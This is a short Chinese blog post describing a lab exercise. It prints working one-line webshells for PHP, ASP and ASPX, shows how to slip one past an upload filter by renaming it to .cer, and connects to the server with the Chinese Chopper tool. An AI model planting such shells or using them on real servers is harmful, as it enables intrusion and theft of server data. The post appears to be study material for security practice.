一句话木马：初识木马练习

Posted 2021-08-29 Zeker62

一句话木马：

不是mua，木马是根据撰写了恶意代码的文件，以实现恶意攻击的目的。

一句话木马就一句话，配合中国菜刀等工具可以实现数据的摄取。

php木马： <?php @eval($_POST['password']);?>
asp是：   <%eval request ("password")%>
aspx是：  <%@ Page Language="Jscript"%> <%eval(Request.Item["password"],"unsafe");%>

以asp为例子：

• eval：执行
• request：从用户那里，获得里面的信息
• password：我们与木马相约好的密码。

这就是一句话木马

什么是webshell

就是网络的人机交互界面。
拿shell就是拿去web服务器的权限。

靶场练习，上传一句话木马到服务器，并摄取信息：

制作一句话木马文件：

这样，我们的文件就制作好了。

然后随便找一个地方上传，结果发现，不允许上传。

cer文件和asp文件都指向的是asp.dll 所以这两个文件都可以被解析。
但是这里怕文件太小了，我们在文件里面加点乱七八糟的东西

上传，记住路径

打开路径看是否上传成功
乱七八糟也不知道是啥，但是就似乎上传成功了

打开中国菜刀，远程连接，入侵服务器

类型选择ASP

添加好后双击打开，就可以看见里面的内容了

路漫漫其修远兮，吾将上下而求索